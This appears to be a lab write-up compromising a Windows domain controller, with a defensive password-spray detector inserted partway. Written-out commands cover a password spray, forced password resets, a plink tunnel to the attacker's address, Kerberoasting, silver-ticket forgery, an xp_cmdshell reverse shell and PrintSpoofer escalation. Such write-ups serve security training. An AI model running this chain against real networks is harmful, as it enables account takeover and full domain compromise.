Machine Information
- Machine Name: Nagoya
- Machine Difficulty: Hard
Information Gathering
Classic nmap time
Nmap scan report for 192.168.188.21
Host is up, received user-set (0.021s latency).
Scanned at 2024-10-18 11:17:21 +08 for 196s
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-favicon: Unknown favicon MD5: 9200225B96881264E6481C77D69C622C
|_http-title: Nagoya Industries - Nagoya
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-10-18 03:18:56Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|_ssl-date: 2024-10-18T03:20:36+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: NAGOYA-IND
| NetBIOS_Domain_Name: NAGOYA-IND
| NetBIOS_Computer_Name: NAGOYA
| DNS_Domain_Name: nagoya-industries.com
| DNS_Computer_Name: nagoya.nagoya-industries.com
| DNS_Tree_Name: nagoya-industries.com
| Product_Version: 10.0.17763
|_ System_Time: 2024-10-18T03:19:56+00:00
| ssl-cert: Subject: commonName=nagoya.nagoya-industries.com
| Issuer: commonName=nagoya.nagoya-industries.com
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-01T01:46:30
| Not valid after: 2025-01-31T01:46:30
| MD5: 21dd:ee05:f731:db23:c7aa:082b:c258:7fe0
| SHA-1: 62cd:9159:e060:0cc5:4a2a:a278:214b:97d5:04df:0598
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49676/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49679/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49693/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49708/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
There are a lot of open ports, but I'll start with the web port.
Port 80
I started out by looking around the website and also searching for potential directories.
After going through it for some time, I noticed that there's a page which provides a lot of first names and last names.
Other than this, I could not find anything else. I then started to combine the first name and last name into usernames such as firstname.lastname.
cat user
Matthew.Harrison
Emma.Miah
Rebecca.Bell
Scott.Gardner
Terry.Edwards
Holly.Matthews
Anne.Jenkins
Brett.Naylor
Melissa.Mitchell
Craig.Carr
Fiona.Clark
Patrick.Martin
Kate.Watson
Kirsty.Norris
Andrea.Hayes
Abigail.Hughes
Melanie.Watson
Frances.Ward
Sylvia.King
Wayne.Hartley
Iain.White
Joanna.Wood
Bethan.Webster
Elaine.Brady
Christopher.Lewis
Megan.Johnson
Damien.Chapman
Joanne.Lewis
Although I now have potential usernames, I do not have any password to perform a brute force attack. I tried to use rockyou.txt
but it did not work. I then tried to get some passwords using words from the website, such as Nagoya.
netexec smb 192.168.188.21 -u user -p "Nagoya2023"
SMB 192.168.188.21 445 NAGOYA [*] Windows 10 / Server 2019 Build 17763 x64 (name:NAGOYA) (domain:nagoya-industries.com) (signing:True) (SMBv1:False)
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Matthew.Harrison:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Emma.Miah:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Rebecca.Bell:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Scott.Gardner:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Terry.Edwards:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Holly.Matthews:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Anne.Jenkins:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Brett.Naylor:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Melissa.Mitchell:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Craig.Carr:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Fiona.Clark:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Patrick.Martin:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Kate.Watson:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [-] nagoya-industries.com\Kirsty.Norris:Nagoya2023 STATUS_LOGON_FAILURE
SMB 192.168.188.21 445 NAGOYA [+] nagoya-industries.com\Andrea.Hayes:Nagoya2023
netexec ldap 192.168.188.21 -d 'nagoya-industries.com' -u user -p "Nagoya2023"
SMB 192.168.188.21 445 NAGOYA [*] Windows 10 / Server 2019 Build 17763 x64 (name:NAGOYA) (domain:nagoya-industries.com) (signing:True) (SMBv1:False)
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Matthew.Harrison:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Emma.Miah:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Rebecca.Bell:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Scott.Gardner:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Terry.Edwards:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Holly.Matthews:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Anne.Jenkins:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Brett.Naylor:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Melissa.Mitchell:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Craig.Carr:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Fiona.Clark:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Patrick.Martin:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Kate.Watson:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [-] nagoya-industries.com\Kirsty.Norris:Nagoya2023
LDAP 192.168.188.21 389 NAGOYA [+] nagoya-industries.com\Andrea.Hayes:Nagoya2023
After guessing different passwords, I managed to get a user that is able to access SMB and LDAP.
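The pattern in the netexec output above (one password, many accounts, a single hit at the end) is exactly what a defender should be looking for on the domain controller. As an added example that is not part of the writeup, the Python below runs a simple spray detector over constructed Security-log records (4625 failed and 4624 successful network logons; the timestamps, source addresses and line layout are made up for the sample): it flags a source that fails against several distinct accounts inside a short window and names any account that then succeeded from the same source.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of domain-controller Security events (not captured from the
# writeup's host), modelled on the spray shown above: one source tries a single
# password against many accounts over SMB (NTLM network logon, LogonType=3),
# failing with STATUS_LOGON_FAILURE (0xC000006D) until Andrea.Hayes succeeds.
SAMPLE_EVENTS = """\
2024-10-18T03:25:01Z 4625 TargetUserName=Matthew.Harrison IpAddress=192.168.45.221 LogonType=3 Status=0xC000006D
2024-10-18T03:25:01Z 4625 TargetUserName=Emma.Miah IpAddress=192.168.45.221 LogonType=3 Status=0xC000006D
2024-10-18T03:25:01Z 4625 TargetUserName=Rebecca.Bell IpAddress=192.168.45.221 LogonType=3 Status=0xC000006D
2024-10-18T03:25:02Z 4625 TargetUserName=Scott.Gardner IpAddress=192.168.45.221 LogonType=3 Status=0xC000006D
2024-10-18T03:25:02Z 4625 TargetUserName=Terry.Edwards IpAddress=192.168.45.221 LogonType=3 Status=0xC000006D
2024-10-18T03:25:02Z 4625 TargetUserName=Holly.Matthews IpAddress=192.168.45.221 LogonType=3 Status=0xC000006D
2024-10-18T03:25:03Z 4624 TargetUserName=Andrea.Hayes IpAddress=192.168.45.221 LogonType=3
2024-10-18T03:40:00Z 4625 TargetUserName=Craig.Carr IpAddress=10.0.0.7 LogonType=3 Status=0xC000006D
2024-10-18T03:41:00Z 4625 TargetUserName=Craig.Carr IpAddress=10.0.0.7 LogonType=3 Status=0xC000006D
"""

LINE_RE = re.compile(r"^(\S+)\s+(\d{4})\s+(.*)$")


def parse_events(text):
    """Turn the flat sample lines into dicts with a datetime, event id and fields."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip blank or malformed lines
        ts, event_id, rest = m.groups()
        fields = dict(kv.split("=", 1) for kv in rest.split())
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "id": int(event_id),
            "user": fields.get("TargetUserName", "").lower(),
            "src": fields.get("IpAddress", "-"),
        })
    return sorted(events, key=lambda e: e["time"])


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Flag a source that fails network logons (4625) against at least
    min_accounts distinct accounts inside a sliding window. A 4624 from the
    same source inside that window is recorded as the account whose password
    the spray guessed. Returns {source_ip: alert}."""
    recent = defaultdict(deque)  # per-source events still inside the window
    alerts = {}
    for ev in events:
        q = recent[ev["src"]]
        q.append(ev)
        while ev["time"] - q[0]["time"] > window:
            q.popleft()
        failed = {e["user"] for e in q if e["id"] == 4625}
        if len(failed) < min_accounts:
            continue
        alert = alerts.setdefault(ev["src"], {
            "first": q[0]["time"], "last": ev["time"],
            "accounts": set(), "compromised": set()})
        alert["last"] = ev["time"]
        alert["accounts"] |= failed
        alert["compromised"] |= {e["user"] for e in q if e["id"] == 4624}
    return alerts


if __name__ == "__main__":
    for src, a in detect_spray(parse_events(SAMPLE_EVENTS)).items():
        print(f"spray from {src}: {len(a['accounts'])} accounts between "
              f"{a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}; "
              f"succeeded as {sorted(a['compromised']) or 'none'}")
```

A lockout policy would not have stopped this spray (one attempt per account), which is why the per-source distinct-account count, not the per-account failure count, is the signal to alert on.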
Port 135
Since I could access LDAP, I tried to run bloodhound-python
to have a quick overview of the Active Directory. Remember to add the needed domain to /etc/hosts
first.
192.168.188.21 nagoya-industries.com nagoya.nagoya-industries.com
bloodhound-python -d 'nagoya-industries.com' -u 'Andrea.Hayes' -p 'Nagoya2023' -ns 192.168.188.21 -c All --zip
INFO: Found AD domain: nagoya-industries.com
INFO: Getting TGT for user
INFO: Connecting to LDAP server: nagoya.nagoya-industries.com
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: nagoya.nagoya-industries.com
INFO: Found 36 users
INFO: Found 56 groups
INFO: Found 2 gpos
INFO: Found 4 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: nagoya.nagoya-industries.com
INFO: Done in 00M 05S
INFO: Compressing output into 20241018114657_bloodhound.zip
After this is complete, I imported the data into BloodHound
and had a look.
Since I have user credentials, I tried to see if it's possible to get a member of HELPDESK,
as the members of HELPDESK
have more permissions.
net rpc password "Iain.White" "P@ssw0rd" -U "nagoya-industries.com"/"Andrea.Hayes"%"Nagoya2023" -S "nagoya.nagoya-industries.com"
Since there's no error message, I think it was executed successfully. Now I try to check if I have access to the user using netexec.
netexec ldap 192.168.188.21 -d 'nagoya-industries.com' -u Iain.White -p "P@ssw0rd"
SMB 192.168.188.21 445 NAGOYA [*] Windows 10 / Server 2019 Build 17763 x64 (name:NAGOYA) (domain:nagoya-industries.com) (signing:True) (SMBv1:False)
LDAP 192.168.188.21 389 NAGOYA [+] nagoya-industries.com\Iain.White:P@ssw0rd
I have successfully changed the password accordingly. Since I have a member of HELPDESK,
I tried to see if I could edit the credentials of Christopher.Lewis
using the same method.
net rpc password "Christopher.Lewis" "P@ssw0rd" -U "nagoya-industries.com"/"Iain.White"%"P@ssw0rd" -S "nagoya.nagoya-industries.com"
Alright, it seems like I could change the password again. Now that I have changed the password of Christopher.Lewis,
I should be able to get a shell according to BloodHound.
Port 5985
netexec winrm 192.168.188.21 -u christopher.lewis -p 'P@ssw0rd'
WINRM 192.168.188.21 5985 NAGOYA [*] Windows 10 / Server 2019 Build 17763 (name:NAGOYA) (domain:nagoya-industries.com)
WINRM 192.168.188.21 5985 NAGOYA [+] nagoya-industries.com\christopher.lewis:P@ssw0rd (Pwn3d!)
Yep, it works accordingly. It seems like I could get a shell with WinRM.
evil-winrm -i 192.168.188.21 -u christopher.lewis -p 'P@ssw0rd'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> whoami
nagoya-ind\christopher.lewis
Now that I have a shell but not an administrator account, it's time for privilege escalation.
Privilege Escalation
As usual, I started out by running winPEAS first. Here's some interesting information from the result.
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> netstat -ano | findstr "TCP"
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 628
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 880
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 628
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 628
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 880
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 628
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 4372
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 628
It seems like there is a port 1433
listening, but the port was not available to me according to the nmap result. I then tried to perform port forwarding to check the port.
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> echo y | .\plink.exe -ssh -l root -pw <passhere> -N -R 1433:127.0.0.1:1433 192.168.45.221
plink.exe : The host key is not cached for this server:
+ CategoryInfo : NotSpecified: (The host key is...or this server::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
192.168.45.221 (port 22)
You have no guarantee that the server is the computer you think it is.
The server's ssh-ed25519 key fingerprint is:
ssh-ed25519 255 SHA256:f5uu0qIl1ojNEKoHnnBY834sDdVtjaLV0bvfFFYyGAU
If you trust this host, enter "y" to add the key to Plink's cache and carry on connecting.
If you want to carry on connecting just once, without adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the connection.
Store key in cache? (y/n, Return cancels connection, i for more info) Using username "root".
nmap localhost -p 1433
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-18 13:06 +08
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000074s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE
1433/tcp open ms-sql-s
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
I tried to access it using my current user but could not execute any command, so I decided to check on other users. I then tried to perform a Kerberoasting attack to check if there's any potential user.
impacket-GetUserSPNs nagoya-industries.com/Christopher.Lewis:'P@ssw0rd' -dc-ip 192.168.188.21 -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------------- ------------ ------------------------------------------------ -------------------------- -------------------------- ----------
http/nagoya.nagoya-industries.com svc_helpdesk CN=helpdesk,CN=Users,DC=nagoya-industries,DC=com 2023-04-30 15:31:06.190955 <never>
MSSQL/nagoya.nagoya-industries.com svc_mssql 2023-04-30 15:45:33.288595 2024-08-02 09:48:41.441299
[-] CCache file is not found. Skipping...
I then copied the hash and tried to crack it for a potential password.
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Service1 (?)
1g 0:00:00:01 DONE (2024-10-18 13:20) 0.9803g/s 1020Kp/s 1020Kc/s 1020KC/s Sonne0211..Sandy1988
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Since I have the password, I tried to access MSSQL hoping to execute commands, but no hope. I then noticed this article, which talks about the Silver Ticket Attack. I decided to perform a silver ticket attack, as it seems like I could get some extra permissions by impersonating another user. To perform a silver ticket attack, I'll need to gather some information.
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> get-addomain
AllowedDNSSuffixes : {}
ChildDomains : {}
ComputersContainer : CN=Computers,DC=nagoya-industries,DC=com
DeletedObjectsContainer : CN=Deleted Objects,DC=nagoya-industries,DC=com
DistinguishedName : DC=nagoya-industries,DC=com
DNSRoot : nagoya-industries.com
DomainControllersContainer : OU=Domain Controllers,DC=nagoya-industries,DC=com
DomainMode : Windows2016Domain
DomainSID : S-1-5-21-1969309164-1513403977-1686805993
ForeignSecurityPrincipalsContainer : CN=ForeignSecurityPrincipals,DC=nagoya-industries,DC=com
Forest : nagoya-industries.com
InfrastructureMaster : nagoya.nagoya-industries.com
LastLogonReplicationInterval :
LinkedGroupPolicyObjects : {CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=nagoya-industries,DC=com}
LostAndFoundContainer : CN=LostAndFound,DC=nagoya-industries,DC=com
ManagedBy :
Name : nagoya-industries
NetBIOSName : NAGOYA-IND
ObjectClass : domainDNS
ObjectGUID : 1153c877-efa1-443b-b59f-c32c9286750e
ParentDomain :
PDCEmulator : nagoya.nagoya-industries.com
PublicKeyRequiredPasswordRolling : True
QuotasContainer : CN=NTDS Quotas,DC=nagoya-industries,DC=com
ReadOnlyReplicaDirectoryServers : {}
ReplicaDirectoryServers : {nagoya.nagoya-industries.com}
RIDMaster : nagoya.nagoya-industries.com
SubordinateReferences : {DC=ForestDnsZones,DC=nagoya-industries,DC=com, DC=DomainDnsZones,DC=nagoya-industries,DC=com, CN=Configuration,DC=nagoya-industries,DC=com}
SystemsContainer : CN=System,DC=nagoya-industries,DC=com
UsersContainer : CN=Users,DC=nagoya-industries,DC=com
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> Get-ADUser -Filter {SamAccountName -eq "svc_mssql"} -Properties ServicePrincipalNames
DistinguishedName : CN=svc_mssql,CN=Users,DC=nagoya-industries,DC=com
Enabled : True
GivenName : svc_mssql
Name : svc_mssql
ObjectClass : user
ObjectGUID : df7dda21-173f-4a4a-88ed-70d69481b46e
SamAccountName : svc_mssql
ServicePrincipalNames : {MSSQL/nagoya.nagoya-industries.com}
SID : S-1-5-21-1969309164-1513403977-1686805993-1136
Surname :
UserPrincipalName : svc_mssql@nagoya-industries.com
After gathering the domain SID and SPN, I could forge a silver ticket. The NT hash could be generated using this link.
impacket-ticketer -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com -user-id 500 Administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for nagoya-industries.com/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
After the ticket is created, add it to the KRB5CCNAME variable.
export KRB5CCNAME=$PWD/Administrator.ccache
After everything is done, make sure to add the domain to 127.0.0.1 as well, since port 1433 is forwarded to local and I'll need to redirect it to my localhost as well.
cat /etc/hosts
127.0.0.1 nagoya-industries.com nagoya.nagoya-industries.com
192.168.188.21 nagoya-industries.com nagoya.nagoya-industries.com
After everything is set, I should be able to access port 1433 as administrator with the ticket.
impacket-mssqlclient -k nagoya.nagoya-industries.com
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(nagoya\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(nagoya\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (NAGOYA-IND\Administrator dbo@master)> enable_xp_cmdshell
[*] INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
I could finally perform command execution through the MSSQL service. I then quickly got a reverse shell by uploading nc.exe.
rlwrap nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.45.221] from (UNKNOWN) [192.168.188.21] 50068
Microsoft Windows [Version 10.0.17763.4252]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nagoya-ind\svc_mssql
Now that I have another user, it's time to perform privilege escalation again to see what permissions the current user has.
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
It seems like I have the SeImpersonatePrivilege
permission. Time to perform a potato attack. I will be using PrintSpoofer
to perform the potato attack.
C:\Users\Public>.\print32.exe -i -c cmd
.\print32.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.4252]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nagoya-ind\nagoya$
C:\Windows\system32>whoami /groups
whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================= ================ ============================================== ===============================================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Windows Authorization Access Group Alias S-1-5-32-560 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NAGOYA-IND\NAGOYA$ User S-1-5-21-1969309164-1513403977-1686805993-1000 Mandatory group, Enabled by default, Enabled group
NAGOYA-IND\Domain Controllers Group S-1-5-21-1969309164-1513403977-1686805993-516 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS Well-known group S-1-5-9 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
NAGOYA-IND\Denied RODC Password Replication Group Alias S-1-5-21-1969309164-1513403977-1686805993-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\System Mandatory Level Label S-1-16-16384
It seems like I have successfully got a user in the administrators group, and I could just access everything now ~
Things I learned from this machine
- guessing passwords by getting words from the website.
- bloodhound to get a lot of useful information
- using net rpc to edit other users' credentials because they have GenericAll permission
- port forwarding using plink
- perform silver ticket attack to impersonate administrator
- potato attacks !!!!